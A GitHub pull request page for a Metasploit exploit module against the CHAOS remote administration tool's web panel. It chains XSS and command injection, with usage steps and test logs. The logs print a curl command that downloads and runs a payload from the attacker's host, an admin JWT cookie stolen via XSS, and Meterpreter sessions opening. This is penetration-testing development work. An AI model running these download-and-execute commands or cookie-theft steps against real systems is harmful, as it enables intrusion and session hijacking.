search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
32.92k stars 13.72k forks source link

CHAOS rat xss to rce #19104

Open h00die opened 4 weeks ago

h00die commented 4 weeks ago

CHAOS v5.0.8 is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems. The webapp contains a remote command execution vulnerability which can be triggered by an authenticated user when generating a new executable. The webapp also contains an XSS vulnerability within the view of a returned command being executed on an agent.

Execution can happen through one of three routes:

  1. Provided credentials can be used to execute the RCE directly
  2. A JWT token from an agent can be provided to emulate a compromised host. If a logged in user attempts to execute a command on the host the returned value contains an xss payload.
  3. Similar to technique 2, an agent executable can be provided and the JWT token can be extracted.

Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running in a docker container.

Verification

  1. Install the application or run the docker image
  2. Start msfconsole
  3. Do: use exploit/linux/http/chaos_rat_xss_to_rce
  4. Do: set rhost [ip]
  5. Pick a method:
    1. set username [username], set password [password]
    2. set jwt [jwt token]
    3. set agent [path to agent]
  6. Do: run
  7. You should get a shell. Interaction by a CHAOS admin may be required
h00die commented 4 weeks ago

@chebuya wanted to bring this to your attention since you discovered it

cgranleese-r7 commented 1 week ago

Tested and seems to be working as intended 👍

Happy to land once the rest of the feedback is resolved.

Credential method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./oYcqobeBZTuJ http://<ip>:9090/Odyz7kVKF-TYi8-49qC08A; chmod +x ./oYcqobeBZTuJ; ./oYcqobeBZTuJ &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /Odyz7kVKF-TYi8-49qC08A
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through direct login
[*] Attempting login
[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:47768) at 2024-05-08 10:23:11 +0100

Agent method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > exploit

[*] Command to run on remote host: curl -so ./IyktmtoLxSkl http://<ip>:9090/7PTrmgXiZtm7zaMXvFhTIQ; chmod +x ./IyktmtoLxSkl; ./IyktmtoLxSkl &
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on <ip>:9090
[*] HTTP server started
[*] Adding resource /7PTrmgXiZtm7zaMXvFhTIQ
[*] Started reverse TCP handler on <ip>:4444
msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through Agent
[*] Server address: 172.17.0.2
[*] Server port: 8080
[*] Server JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3NDY2OTMwMDAsInVzZXIiOiJkZWZhdWx0In0.E_TQ2pqNzZgRw5syoX_aXFjarI3CNvgP7DcVzLYVPu4
[*] Fake MAC for agent: b5:51:a0:d9:ee:f1
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjc5MzUsIm9yaWdfaWF0IjoxNzE1MTY0MzM1LCJ1c2VyIjoiYWRtaW4ifQ.de-YBhkfbxKv7l25kw_oo6AELR6_U1nf2VD6JtWzBz4
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      b5:51:a0:d9:ee:f1

[*] Client <ip> requested /7PTrmgXiZtm7zaMXvFhTIQ
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:61669) at 2024-05-08 11:32:31 +0100

JWT method

msf6 exploit(linux/http/chaos_rat_xss_to_rce) > [!] The service is running, but could not be validated. Chaos application found
[*] Attempting exploitation through JWT token
[*] Fake MAC for agent: fe:9a:14:40:91:66
[*] Listening for XSS response on: http://<ip>:8888/
[*] Performing Callback Checkin
[*] WebSocket connecting to receive commands
[*] Performing Callback Checkin
[+] Received agent command 'whoami', sending XSS in return
[*] Received GET request.
[+] Received cookie: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MTUxNjg1MDgsIm9yaWdfaWF0IjoxNzE1MTY0OTA4LCJ1c2VyIjoiYWRtaW4ifQ.8MjwkzGcIT0QatzRf6kMLMihBTdKyFQb1mrzGfJj9Ho
[+] Detected Agents
Live Agents
===========

 IP            OS       Username                       Hostname  MAC
 --            --       --------                       --------  ---
 <ip>  Windows  Administrator (Administrator)  DC01      a8:ae:8a:9e:e0:11
 <ip>  Windows  Administrator (Administrator)  DC01      fe:9a:14:40:91:66

[*] Client <ip> requested /Odyz7kVKF-TYi8-49qC08A
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 2 opened (<ip>:4444 -> <ip>:33236) at 2024-05-08 11:46:05 +0100